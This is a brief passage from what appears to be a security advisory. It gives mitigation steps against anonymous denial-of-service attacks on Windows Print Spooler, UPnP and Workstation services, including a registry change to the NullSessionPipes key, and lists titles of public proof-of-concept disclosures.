Prevention:: Disable the Print Spooler / Universal Plug and Play services on hosts that do not need the services running.
Or disable anonymous connections to the service via the registry:: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\NullSessionPipes and remove 'SPOOLSS' from the registry key.
This will allow for only authenticated access to the Print Spooler service, disabling the vector for anonymous attack.
Links::
First Public PoC Code Disclosure - UPNP (Denial of Service)
Second Public PoC Code Disclosure - SPOOLSS (Denial of Service)
Third Public PoC Code Disclosure - Workstation Service (Denial of Service)